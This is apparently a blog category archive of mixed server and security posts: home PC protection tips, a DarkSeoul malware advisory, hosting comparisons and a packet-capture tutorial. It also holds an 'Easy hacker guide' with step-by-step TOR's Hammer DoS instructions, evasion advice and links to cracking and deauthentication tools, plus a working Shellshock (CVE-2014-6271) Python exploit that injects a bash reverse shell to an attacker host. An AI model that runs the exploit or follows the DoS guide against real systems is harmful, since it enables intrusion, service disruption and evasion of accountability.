Category Archives: Server

How To Protect Your PC From Hackers?

Computer viruses are rapidly growing in the World Wide Web as numerous hackers unleash them on internet in the hope of stealing private financial information. To protect yourself completely, it is important to have a set of tools hardware and software on your network and pc so that you can safeguard it from any possible virus, malware,worm, trojan threat.

Although hackers are hunting for unprotected networks and systems, the best antivirus software programs provide complete protection so that you don’t become one of the vulnerable…still! There is a lots then can be done…

To prevent your data from being compromised it is important to minimize the damaging effects by taking some compulsory measures to safeguard your system from online viruses. A Few tips to protect your system from viruses and spyware are mentioned below:

Use a Dynamic Firewall Protection: Download antivirus software in conjunction with an effective firewall that can successfully protect against hackers from breaking into your PC. A firewall filters information passed through internet to your network and prevents hackers from attacking your computer.

Best bet is to use a firewall embedded in a router . The best ones are to open source firmware ones on linux base. Constantly updated and full of configurations.

Software ones are ok , but you’ll need a copy on every pc,tablet and phone connected to your network.

Use WPA/ WPA2 Encryption: It is essential to use WPA or WPA2 encryption to protect against hackers from attacking your PC over a wireless network. Encrypted wireless transmissions are not impossible to break, although it takes considerable amount of time and effort for hackers to get information. The weaker your wireless network the less time would it take for a hacker to access your PC.

That mean a strong password.

Additionally set up you wireless router with a guest network , so your visitors are not going to connect on your main network with their , surely , less protected devices.

Open Attachments from Trusted Sources: Attachments that are from trusted and known sources can be opened, and everything else must be deleted immediately. Even though they are many types of file attachments that you may be curious about, it is best that you don’t compromise your PC safety by opening them if they are not from a trusted source.

This is an human thing , use an email service with a strong antivirus detection , do not skimp on that.

Still make sure you never click on weird attachment.

Install a sandbox system on your pc to test and check these attachment.

Maybe a Linux virtual machine!

Active Antivirus Program: Choosing an effective computer virus protection is essential as it gives guaranteed protection against malicious code and other harmful online virus threats. If you accidently download a virus infected file, your antivirus download will provide protection and quarantine the file.

Which antivirus the best…difficult they are all good and bad, even the Windows defender does work fine.

It all about prevention.

Following the above mentioned essential steps will help you to safeguard your PC and keep your private and confidential information safe. Stay vigilant and choose a dynamic antivirus program to safeguard your system.

Again use a crypted DNS server like cloudfare 1.1.1.1, check before you use them and check if the traffic is spied by them.

Use a VPN service for untrusted or in need of security sites( Northvpn served me well to the current day)

Keep you router password strong and keep your router updated.

With more following articles I’ll show some brands able to help you around.😎

However the weakest link in the chain is you with you curiosity and weakness in clicking on anything!😃

1 second click days of pain!😭

Good luck

Easy hacker guide

First and foremost, it is important for you to understand that ‘hacking’ is a broad term. There are many aspects
to it, most of which require several programming skills, but that shouldn’t stop you from using the tools made
available by the internet for you to take advantage of.
Go to the HTMLdog website and learn some HTML first, it is a great website and you will progress in no time. Also,
consider Python as your first programming language; it is a tradition to recommend Python to newbies because it is
the fundamental and appropriate language that will kickstart you in the world of computing. So, now that you are
set and ready to continue with the quest, allow me to present to you a simplistic and minimalistic reference guide.
On a side note, before you start, make sure your internet connection has some sort of protection, either through a
proxy or a VPN. DO NOT TAKE ANY RECOMMENDATIONS FROM OTHER ANONYMOUS MEMBERS, EVEN OPS.
They could be trying to hook you up with a VPNservice that is cooperating with the feds.
Do your own research on your VPN, Privacy policy, Terms of Agreement etc. NOBODY IS GOING TO JAIL FOR YOU.
After that, pay with anonymous payment methods, again, do your own research on those methods too.
[PS: Do NOT perform DDoS attacks while on VPN. They may protect your data from the destination, but don’t go as far
as trusting them when you’re sending endless packets over their servers. Needless to say, your safety is not of any
concern to me so take care of yourself first.]
———-
OS Picking
———-
For hacking specifically, it is recommended to use open source Operating Systems (OSes) such as Linux distributions
that have root (Administrator) privileges in order to get the most out of the tools you use. Let me give you some
ordered examples:
FOR LINUX NOOBS
1) Mint — great to learn Linux and for hacking as well, tools can be added easily, and has a lovely desktop.
2) Ubuntu — same as mint, but better approach toward learning Linux than just looking good. Mint is based on it.
3) Tails — strongly recommended as a Virtual Machine, it is closest to anonymity you can get.
Despite what other anons and the internet is saying, Kali isn’t useful to you unless you have your own server to work on.
The OS is broken and insecure, and is built for security pentesters.
Kali will provide very poor security unless you know what you’re doing.
————–
Wireless Cards
————–
In case you do as I suggested above, and get yourself a Virtual Machine (VM) with either of the three recommended
distributions, you will need a USB Wireless Network Adapter in order to be able to execute wireless attacks from it.
This is needed because a Virtual Machine cannot share a single wireless card with the host machine. For the sake of
convenience, price, accuracy, packet injection and sniffing capabilities, I strongly recommend a very widely used
card called the Alfa AWUS036NHA with the AR9271 chipset, which can be found by following the link directly below:
http://www.simplewifi.com/alfa80211bgnhighpoweradapter150mbpsatherosar9271chipset.html
———
Anonymity
———
There is a constant presence of fear in everyone’s mind that our information is being monitored 24/7/365 by people
behind monitors all day long, searching for private data and invading your personal life. Well, this conspiracy is
something experienced by those who have something to hide from the authorities, whether it is illegal or possibly
embarrassing.
Either way, there is one thing you must know — you will never be able to fully protect yourself while
browsing on the internet. However, there are several tools and techniques you may embed in order to get as close as
possible to being anonymous online. True anonymity lies in several layers of data transfer, which is difficult for
an individual to achieve without knowledge of 3rdparty software that allows such possibilities.
Remember, there’s no magical tool that let’s you be 100% anonymous online.
You will NEVER be 100% anonymous in a system that is designed to be traceable.
Let’s get straight to the point. The following techniques will help to achieve a high anonymity level:
• TOR — found at https://www.torproject.org/ it allows you to connect through several nodes before reaching a server,
       and that way all data transfer stays private. For maximum browsing anonymity,
        use the TOR browser in combination with a good, paid VPN as well.
• VPN — stands for Virtual Private Network and is a server that you connect through before you reach anything online.
       From a security point of view, it is the safest and most anonymous tool to use, as long as you trust the VPN
       provider.
• Proxy — This is another possible way to achieve good anonymity, but is often slow and unreliable for torrenting or
         downloading large files. Proxy websites can be found anywhere online, but preferably use proxy servers that
         need configuration of the browser settings, since that will likely cause fewer javascript and HTML issues.
• More Useful Tools/Guides
                1) Anonymous file sharing: https://onionshare.org
               2) File uploading: http://tinyupload.com/  and  https://anonfiles.com/
                3) http://www.deepdotweb.com/jollyrogerssecurityguideforbeginners/
—————-
DoS & DDoS Tools (don’t use them unless instructed)
—————-
HOWEVER: if anybody tells you to use tools such as LOIC, XOIX, HOIC or any other similar tools, do not listen to them
        since they obviously are not aware of the incredibly high risks of getting caught when using them. Tools that
        end in OIC are easily traced to your IP address and expect to get in trouble if you use them. Besides, using
        them on your own will cause no damage to public IPs due to the severe limitations. So, end point, forget it!
======================================================================================================================
TOR’s Hammer (works on systems that have Python installed.)
• Note: this tool allows the use of the TOR browser to prevent getting caught. I recommend and, in some ways, insist
 that you do so, because nobody other than you is liable for the damage you will cause from using this tool.
How to Set Up:
0) Download it first, duh! http://sourceforge.net/projects/torshammer
1) Download python. Note: Mac users have it preinstalled
2) Place the torshammer folder (unpackaged) on your Desktop
3) In the torshammer folder there will be a file called ‘torshammer.py’ that you will need to open with a text editor
4) Inside the file, use the Find & Replace function to replace the three occurrences of ‘9050’ with ‘9150’ and save
5) Open CMD or Terminal and type (without quotes) “cd Desktop” and then “cd torshammer”
6) Now open the TOR browser and wait for your new identity. To ensure it works, visit at least 2 >DIFFERENT< websites
7) In your CMD / Terminal type (without quotes) “./torshammer.py t example.com r 300 T”
  To understand the syntax of the command, ‘cd’ to the torshammer folder and type (without quotes) “./torshammer.py”
Slowloris
One of my favorite tools that I used when I started DoSing.
IPV4 version: http://ha.ckers.org/slowloris/slowloris.pl
IPV6 version: http://ha.ckers.org/slowloris/slowloris6.pl
To download, simply copy the text to a file and save it as slowloris.pl and/or slowloris6.pl respectively.
You will need perl in order to run Slowloris, tutorials of which can be found online.
Ufonet
>>> https://github.com/epsylon/ufonet
I will not explain here how to set this up, since you have Google at your disposal.
MDK3
This is preinstalled on Kali Linux and it basically allows to deauthenticate any WiFi routers in range by overloading
them with empty packets until they can no longer operate, thus taking them down locally on your own (DoS).
======================================================================================================================
———————–
Password Cracking Tools
———————–
Ophcrack
Read info      >>> http://blog.codinghorror.com/rainbowhashcracking
Download       >>> http://ophcrack.sourceforge.net
L0phtCrack
It is an alternative to Ophcrack and is used to crack Windows passwords from hashes.
http://www.l0phtcrack.com/download.html
John the Ripper
>>> http://www.openwall.com/john
Reaver
This is specifically a WPA(&2) WiFi cracking tool, supporting routers with WPS (Wireless Protected Setup) enabled
It is preinstalled on Kali Linux, and hopefully on the other hacking Linux distributions too. It does NOT work
on Windows, in fact Windows is the least reliable OS for hacking, so I regard it as a skiddie OS.
Aircrackng
Cracks WPE & WPA; it analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm.
http://www.aircrackng.org/install.html
Hydra
This uses brute force and dictionary attacks to crack any password that is on a specific wordlist. It is well built
and is very configurable, giving you a wide range of options to pick from, and limits to set. Here’s a great tutorial:
http://nullbyte.wonderhowto.com/howto/hacklikeprocrackonlinepasswordswithtamperdatathchydra0155374
Hashcat
Uses your GPU to crack hashes, very strong.
http://hashcat.net/hashcat/
——————————–
Man In The Middle (MITM) Attacks
——————————–
Note: enable routing first, by typing in terminal (without quotes) “echo 1 > /proc/sys/net/ipv4/ip_forward”
================================
Wireshark
Extremely configurable and versatile, and has close to no limitations as to functionality.
Kali Linux has it preinstalled. For Windows and Mac, download it here: https://www.wireshark.org/download.html
Ettercap
As usual, it is preinstalled on Kali Linux. It performs marvellously, and supports ‘driftnet’ (for image capturing).
>>> http://ettercap.github.io/ettercap/downloads.html
—————-
Website Scanning
—————-
nmap
This is great for port scanning, checking whether a host is up, ping scan, TCP and UDP, etc.
>>> http://nmap.org/download.html
Nikto
It performs comprehensive tests against web servers for items including potentially dangerous files, performs checks
for outdated server versions, and version specific problems.
>>> https://github.com/sullo/nikto
Dmitry
About it  >>>  http://linux.die.net/man/1/dmitry
Download  >>>  http://packetstormsecurity.com/files/download/35796/DMitry1.2a.tar.gz
Vega
A powerful vulnerability scanner.
>>> https://subgraph.com/vega/download
CL2 (filename)
This is a simple web crawler written in Python that indexes all hyperlinks of a particular webpage and/or website.
>>> https://ghostbin.com/paste/vg3af
FTPSpider
Written in perl, it cleverly scans FTP servers and logs their directory structure, detects anonymous access & writable
directories, and looks for user specified data.
http://packetstormsecurity.com/files/35120/ftpspider.pl.html
Arachni
This is a framework developed to assess web app security and evaluate them in real time.
Read about it & download it here >>> http://www.arachniscanner.com/
————–
Useful To Note
————–
Detailed information about IP addresses — http://www.iptracker.org
A course I highly recommend you follow — http://offensivesecurity.com/metasploitunleashed/Main_Page
Find out what websites are built with — http://builtwith.com
======================================================================================================================
======================================================================================================================
———-
ALL IN ALL
———-
Conclusion: You are prepared for anything if you are able to apprehend the work that lies ahead, but let me tell you,
           no one is going to endlessly spoonfeed you the information and knowledge, because all you will learn is
           how to copy from someone else. I think the old saying “practice makes perfect” fits this pretty damn well
           from my point of view, and I’m not saying that you can’t ask anything, but if you want to learn fast, do
           it the hard way and look it up yourself, that’s all!
For the record
All tools used above are compatible with Linux distributions (apart from L0phtCrack) and are best used with the three
OSes that I listed at the very beginning. In my personal opinion, and I’m sure many people would agree with me here,
Windows is not suited best for the tools listed above. However, it would be useful for you to get hold of a Virtual
Machine program in that case, such as VirtualBox (( https://www.virtualbox.org/wiki/Downloads )), and a disk image
of a Linux distribution.
If you read the whole lot, that should get you started, and remember to have fun! Good luck 😀

South Korean Malware Attack

 

Executive Summary
Reporting and technical details surrounding the malware used in the March 20, 2013, attack on
South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul.
The common attributes of the attack campaign are the following:
•The malicious file wipes the master boot record (MBR) and other files.
•The malware was hard coded with a specific execution date and time and searches
machines for credentials with administrative/root access to servers.
•The malware is written to specifically target South Korean victims.
•The attack is effective on multiple operating systems.
•The design is low sophistication – high damage.
When assessing the potential risk to U.S. Critical Infrastructure and Key Resources (CIKR), it isimportant to understand that DarkSeoul appears to have been coded for a specific target in this case and designed to evade typical South Korean antivirus processes. As this malware is currently packaged, it is a low risk to U.S. CIKR, however, the concepts underpinning this attack would likely succeed in many common enterprise environments. For this reason, U.S. CIKR owners and operators should continue the best standard security practices to avoid infection and propagation of a wiper or other type of malware that may impact their systems.
Defensive Measures Based on the common attributes detailed above, US‐CERT reminds users and administrators of the importance of best practices to strengthen the security posture of their organization’s systems.
CIKR owners and operators should work toward a resilient network model that assumes such an attack will occur against their enterprise.

The goal is to minimize damage, and provide pathways for restoration of critical business functions in the shortest amount of time possible.
•Encourage users to transfer critical files to network shares, to allow for centralized
backups. Leverage technical solutions to automate centralized storage where possible to
reduce reliance on end-user voluntary compliance.

•Execute daily backups of all critical systems, including offline and offsite copies of
backup media.
•Periodically execute a practice data restoration from backups, including key databases to
ensure integrity of existing backups and processes.
•Establish emergency communications plans should network resources become
unavailable.
•Isolate any critical networks (including operations networks) from business systems, and
where possible segment the business networks.
•Identify critical systems and evaluate the need to have on-hand spares to quickly restore
service.
•Recognize that without proper internal monitoring, an organization’s “Enterprise Trust
Anchors” (Active Directory, PKI, two-factor authentication,
etc.) and centralized management services (remote helpdesk access, patch management and asset inventory suites,etc.) could be compromised and used to subvert all other security controls.
•Maintain up‐to‐date antivirus signatures and engines.
•Restrict users’ ability (permissions) to install and run unwanted software applications
through Microsoft Software Restriction Policy (application directory whitelisting) or
AppLocker, application whitelisting products, or host-based intrusion prevention software.
•Enforce a strong password policy and implement regular password changes.
•Keep operating system patches up to date.
•Disable unnecessary services on workstations and servers.
•Scan for and remove suspicious email attachments; ensure the scanned attachment is its
‘true file type’ (i.e., the extension matches the file header).
•Exercise caution when using removable media (e.g., USB thumb drives, external drives,CDs).
•Scan all software downloaded from the Internet prior to executing by properly authorized
personnel.
•Disable credential caching for all desktop devices with particular importance on critical
systems such as servers and restrict the number of cached credentials for all portable
devices to no more than three, if possible. This can be accomplished through a Group Policy Object (GPO).

Choosing a Hosting Environment – Linux vs Windows

Choosing a hosting environment is one of the first decisions when selecting a Web hosting package. Although you may already have a preference, consider these key differences when creating a new Web project for yourself or a client.

When embarking on a new Web project, one of the first decisions to make is regarding the Web hosting platform. Both Linux and Windows platforms are proven to be reliable and able to support a range of Web projects, so it is not a question of one being superior to the other. While you may have an allegiance to either Linux or Windows based on your choice of operating system or what you’ve been advised, it is essential to choose the technology that is more suited to your style of Web building and fitted to your project’s requirements.

Consider the tools and scripting language you plan to use – if you use PHP, MySQL, Python, Ruby or Perl together with a variety of software programs, Linux is the one for you. If the applications you plan to use are Windows-specific, then Windows hosting is likely to be the right choice. Most Web hosts offer packages that include an array of additional features to maximize both platforms. Either way, there are a variety of ways to bring your Web project to life.

Linux Hosting Overview

When it comes to Web hosting, Linux is widely considered to be the best operating system for Web servers. Characteristically reliable, stable and efficient, Linux supports even the most demanding environments for Web and mail servers.

Linux Web Hosting Packages support the most popular and important scripting languages, including PHP 5.5 and 5.6. Frameworks like Zend, make it easier for you to display dynamic content, quickly access databases, and adapt the functionality of the Web project to your requirements. With 1&1’s git versioning tool, you have the option to save various work items on your Web space.

Linux is also ideal for the kind of websites that display information as a brochure, in newsletter format or as data sheets. Linux works well for ‘brochure-ware’ sites that offer interaction via inquiry forms, online purchasing and other eCommerce functions.

When looking for ready-to-use solutions to power your website, applications such as blogs, content management systems (CMS) or discussion boards, more open-source applications can be found for Linux hosting.

Windows® Hosting Overview

Windows facilitates varying degrees of design and management through a drag-and-drop philosophy, via .NET Framework and SharePoint. By this, Windows presents an advantage when it comes to the integration of Windows applications when you’re designing your website. Essential Windows-specific applications such as ASP® will work comfortably with this particular type of hosting package.  Windows Web Hosting Packages support all .NET Framework versions up to 4.5 and ASP.NET, PHP and Perl. A separate application pool with up to ten .NET applications is also included.

Software for Windows® hosting is more likely to be based on licensed sources that are available to purchase at an additional fee. Yet Windows presents an advantage if you plan to incorporate searchable databases within your website. The reduced development time and better integrated functionality characteristics of Windows® Hosting offer a real advantage for users wishing to incorporate database facilities to their website.

Apps and Services

If all you want to do is create a plain, vanilla website using simple design tools, then either Linux or Windows will do the job. However, if you are looking to build something specific such as a blog or eCommerce site, but do not necessarily want to code something from scratch, then you will want a platform that provides easy access to pre-built sites – and that means Linux hosting is the way to go.

Linux platforms support the most popular open-source applications and content management systems. This includes popular CMS like WordPress, Joomla!, Drupal, Typo3, and Magento. Many Web hosting providers provide tools to simplify the process of setting up Web projects using these popular applications.

With Windows-based hosting, you can add all of this functionality separately, but you may have to pay for the privilege – however, tools like Visual Studio offer free versions to help you get started.

Language and Scripting

Both Linux and Windows packages support key languages such as PHP and Perl, although there is a subtle difference in support. For example, at 1&1, Windows packages currently support PHP 5.3.5, while Linux supports PHP 5.5 and now PHP 5.6 Beta.

Linux packages exclusively support the Zend Framework for PHP 5, plus Ruby and Python languages, while Windows packages add support for Windows-based technologies such as ASP.NET and .NET Framework 4/4.5 as well as ASP MVC 3 and 4 and MS SQL 2012 databases.

Cost

As Linux is an open-source system, most of the tools and scripting languages used on a Linux-based Web platform are also free and open-source. This obviously results in a lower cost overall. They may lack some of the finesse of Windows-based tools, but you can set up anything without having to pay any licensing costs. Software for Windows-based hosting usually comes with a cost attached, although some free solutions can be found.

Linux and Windows differ in price at many Web hosting companies, often with Windows being more expensive due to the additional licensing fees required.

Getting the Local Traffic Report

It can be problematic and lead to headaches – and possibly even hair loss (your follicles may vary) – if you need to capture local network traffic (sent to your own device or PC) as many tools (even the venerable WireShark) aren’t very helpful with that scenario. However, there is a way to do it using two free tools, namely RawCap and the aforementioned WireShark. Once you know how, it’s (almost) as easy as pie — that is, eating a pie, such as an apple pie – not memorizing 3.14….etc)

First, download RawCap here

Next (provided you don’t already have it, of course), download Wireshark here

Once you have RawCap and Wireshark installed, open a command prompt and navigate to the folder where you downloaded RawCap.

Then, enter a command such as “rawcap.exe 127.0.0.1 platypus.pcap

which is:

RawCap.exe [IP Address you want to monitor] [name of file].pcap

You can run RawCap one of two ways:

Run cmd as Administrator Proactively

Select Start > All Programs > Accessories > Command Prompt > r-click > Run as Administrator

Run cmd as “Normal” User and Respond to Prompt

Select Start > “cmd” > [ enter command line for rawcap to use ] > accept “User Account Dialog” dialog

If you use the latter option, the feedback (how many packets have been received) will display in a separate command prompt window:

IOW, the difference between the two ways of running it is: Do you want to get and dismiss the “User Account Control” dialog before you enter the command line verbiage or after you enter it?

Go

Now, perform the procedure that generates the network traffic you want to capture. Once it is finished, you can go back to the command prompt and mash Ctrl+C. Alternatively, you can specify the count of packets you want it to capture, or the number of seconds for which you want it to capture. Enter “rawcap ?” and mash the Enter key for the syntax for doing either of these. Or, you can take my word for it that it is:

-c [packet count]” to “stop sniffing after receiving a specified count of packets

-and

-s [number of seconds]” to “stop sniffing after a specified number of seconds

IOW:

rawcap.exe -c 42 meaningOfLifeEtc.pcap

…to capture 42 packets

-and:

rawcap.exe -s 8 rodeo.pcap

…to capture packets until the cowboy either gets bucked off or outlasts the beast.

After mashing the Enter key to start rawcap capturing, then performing the operation to send/receive packets, and finally mashing Ctrl+C at the command prompt to stop capturing, you will see something like this (where the folder to which you downloaded rawcap replaces “MiscInWindows7”) there at the command line:

After the capture is complete using any of the methodologies delineated above (manually stopping capturing, or setting it to capture a number of packets or for a specified number of seconds), open Wireshark and select File > Open…, navigate to the .pcap file, and open it.

You will then cast your beaming and/or gleaming peepers upon a magnificent cornucopia of information about the network  traffic captured. You can now search through this overgrown forest for individual trees you want to find by select Edit > Find Packet… and then entering what is of interest to you; in my case, I’m expecting some traffic to/from port 7727 on my PC, so I enter that:

…and it takes me to the first line with such; Selecting Find > Next (Ctrl+N) takes me to the next one (etc.)

And so you have it: a couple of free tools and a modicum of work, and you’ve got more network traffic information than your local television stations’ traffic reporter ever dreamed of having.

Check vulnerable reverse shell CGI (shellshock)

#
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
        print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]
        print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0]
        exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3]
headers = {“Content-type”: “application/x-www-form-urlencoded”,
        “test”:reverse_shell }
conn.request(“GET”,sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Web server attack tools

Some of the common web server attack tools include;

  • Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server.
  • MPack– this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites.
  • Zeus– this tool can be used to turn a compromised computer into a bot or zombie. A bot is a compromised computer which is used to perform internet based attacks. A botnet is a collection of compromised computers. The botnet can then be used in a denial of service attack or sending spam mails.
  • Neosplit – this tool can be used to install programs, delete programs, replicating it etc.

Use Virtualbox to Host Your Own Site, Mirror Your Tumblr or WordPress

 

Wwhy not roll your own server at home, and then use it as a dashboard to manage and re-post to sites like Tumblr and WordPress? All you need is Virtualbox. Maymay shows us how it’s done.

Maymay’s setup is brilliant in its simplicity. Ultimately, there’s very little a web host is doing aside from running software that you can run on your own linux-based VM (virtual machine.) You can duplicate the setup rather easily with a VM running in VirtualBox.

Of course, doing this at home doesn’t scale, and it’s not always accessible to the broader internet (not to mention, your ISP won’t be happy if you have a popular site.) So Maymay points out that the goal of the project is to use your personal, self-hosted site as a HUD, a kind of dashboard, from where you can write and edit your posts, save them and back them up, and then use the included plug-ins to push your articles to Tumblr, WordPress, or another hosted service that you don’t control:

Blogging toolkit that provides a unified dashboard for creating and managing content on multiple Web hosting services simultaneously. Obviates the need for backing up your blog by creating content locally and then sending it to a Web server, rather than creating that content on a Web server and then backing it up to your computer.

This way you always have backups that you own and control, and you always have your original content somewhere, in case someone takes down something you’ve written, or something else happens. If you want total control, pair this up with a domain name that you own (and not something that ends in .tumblr.com or .wordpress.com) and you’re in business.

You’ll need to configure VirtualBox and point it at the shared folders that will host your blog content, then install WordPress on your virtual web server, and set up any cross-posting capabilities you might want. To make the process super-easy, Maymay includes a pre-configured “Bring Your Own Content” VM for Virtualbox to get you started that supports Tumblr and WordPress out of the box. Hit the link below to see the whole post and a full walkthrough.

Update: Maymay clarified that the goal of the project is the inverse of how I originally categorized it – the BYOC VM isn’t designed to replace a web host, just serve as a space where you pull the strings and own the content, and then push out to the rest of the web. The post above has been updated to reflect this.

How to configure Apache to serve as load balancer between 2 or more Webservers on Linux / Apache basic cluster

Any admin somehow involved in sphere of UNIX Webhosting knows Apache pretty well. I’ve personally used Apache for about 10 years now and until now I always used it as a single installation on a Linux. Always so far whenever the requirements for more…

Continue reading How to configure Apache to serve as load balancer between 2 or more Webservers on Linux / Apache basic cluster